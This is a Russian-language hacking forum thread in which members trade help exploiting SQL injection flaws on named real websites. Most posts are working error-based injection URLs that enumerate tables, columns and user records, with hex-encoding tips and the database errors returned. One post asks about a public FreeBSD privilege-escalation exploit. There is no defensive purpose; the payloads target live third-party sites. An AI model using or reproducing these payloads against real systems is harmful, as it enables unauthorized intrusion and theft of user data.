Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    может кто поможет =)) никак не смог раскрутить

    http://www.sun-e-shop.co.za/?Task=CompanyInfo&CategoryID=3777'
    http://www.scottishfuturestrust.org.uk/news.asp?id=1'
    http://www.ncm.org.uk/news.asp?id=1'

    иль не раскручиваемые инъекции???
     
  2. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    2 pinch

    http://www.scottishfuturestrust.org.uk/news.asp?id=(SELECT+top+1+table_name+from+information_schema.tables)--
     
    _________________________
  3. mr.celt

    mr.celt Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    133
    Likes Received:
    16
    Reputations:
    12
    Microsoft OLE DB Provider for SQL Server error '80040e14'
    Incorrect syntax near 'SEL'.
    /news.asp, line 83
     
  4. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    хммм.... у меня не катит...

    Microsoft OLE DB Provider for SQL Server error '80040e14'
    Incorrect syntax near 'SEL'.
    /news.asp, line 83
     
  5. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    near SEL

    table_name= SEL ;)
     
    _________________________
  6. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    o sorry :( не прав

    http://www.scottishfuturestrust.org.uk/news.asp?id=(SELECT+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('SEL'))--
     
    _________________________
  7. mr.celt

    mr.celt Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    133
    Likes Received:
    16
    Reputations:
    12
    :D 'SEL' это не название таблицы. а ошибка в синтаксисе
     
  8. GroM88

    GroM88 Elder - Старейшина

    Joined:
    24 Oct 2007
    Messages:
    464
    Likes Received:
    62
    Reputations:
    26
    помогите раскрутить доконца плз = \
    _http://sng.by/articles/439'+and+(select+1+from+(select+count(0),concat((select+table_name+from+information_schema.tables+limit+222,1),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)--+.html
    Вот допустим с этой таблицы нужно узнать колонки и что в них = \
    подскажи как дальше капать?
     
  9. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    http://sng.by/articles/439%27+and+(select+1+from+(select+count(0),concat((select+column_name+from+information_schema.columns+where+table_name=0x6962665F61646D696E5F6C6F6773+limit+6,1),floor(rand(0)*2))+from+information_schema.columns%20+group+by+2)a)--+.html
     
  10. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    +, почти в точку) Ограничение длины GET-запроса, и всё, элементарно
     
  11. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    это не ограничение, а значение переменной обрезается
     
  12. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    тоже самое другими словами ^_^

    Но таки с возвращением, грозный Спудер
     
    #12892 Pashkela, 12 May 2010
    Last edited: 12 May 2010
  13. GroM88

    GroM88 Elder - Старейшина

    Joined:
    24 Oct 2007
    Messages:
    464
    Likes Received:
    62
    Reputations:
    26
    немогу понять = \
    подставляю вместо
    0x6962665F61646D696E5F6C6F6773
    вот это
    0x57365727300 а т.е. таблица users(она есть) но ничего не показывает (всмысле колонки) тупо сайт открывается = \
    что не так делаю? = \
     
  14. Bb0y

    Bb0y Active Member

    Joined:
    30 Oct 2009
    Messages:
    116
    Likes Received:
    136
    Reputations:
    78
    2GroM88, users = 0x7573657273
     
  15. apolon47

    apolon47 Banned

    Joined:
    13 Apr 2009
    Messages:
    119
    Likes Received:
    14
    Reputations:
    4
    http://www.string-functions.com/string-hex.aspx
     
  16. apolon47

    apolon47 Banned

    Joined:
    13 Apr 2009
    Messages:
    119
    Likes Received:
    14
    Reputations:
    4
    вывожу таблицы. версия мускула 5я.
    при выводе таблиц окончание съедается. допустим.

    user_1, user_2, use

    как можно вывести все?
    пользуюсь так group_concat(table_name)
     
  17. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Значит так, хотел порутать фряху выбрал (http://www.exploit-db.com/exploits/10255).
    SH файл исполнять не хотел, решил вручную.
    Делал все по порядку, ошибки были те же, что и на странице с плоентом, НО
    когда запустил ./env выелетло:
    /libexec/ld-elf.so.1: environment corrupt; missing value for
    /libexec/ld-elf.so.1: environment corrupt; aborting

    "/libexec/ld-elf.so.1: environment corrupt; missing value for" - такая же ошибка вылетает и у автора плоента, но вот по след. ошибке видно, что все сбрассывается.

    Можете объяснить почему, пожалуйста?
     
  18. GroM88

    GroM88 Elder - Старейшина

    Joined:
    24 Oct 2007
    Messages:
    464
    Likes Received:
    62
    Reputations:
    26
    _http://sng.by/articles/439'+and+(select+1+from+(select+count(0),concat((select+column_name+from+information_schema.columns+where+table_name=0x7573657273+limit+2,1),floor(rand(0)*2))+from+information_schema.columns+group+by+2)a)--+.html

    Подскажите как теперь составить запрос что бы выводить данные из колонок?
    пжлст = \
     
  19. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    http://sng.by/articles/439'+and+(select+1+from+(select+count(0),concat((s elect+КОЛОНКА+from+users+limit+0,1),floor(ran d(0)*2))+from+information_schema.tables+group+by+ 2)a)--+.html
     
  20. GroM88

    GroM88 Elder - Старейшина

    Joined:
    24 Oct 2007
    Messages:
    464
    Likes Received:
    62
    Reputations:
    26
    что-то не то выдает совсем = \
    Table 'sngby_sngby.users' doesn't exist
     
Thread Status:
Not open for further replies.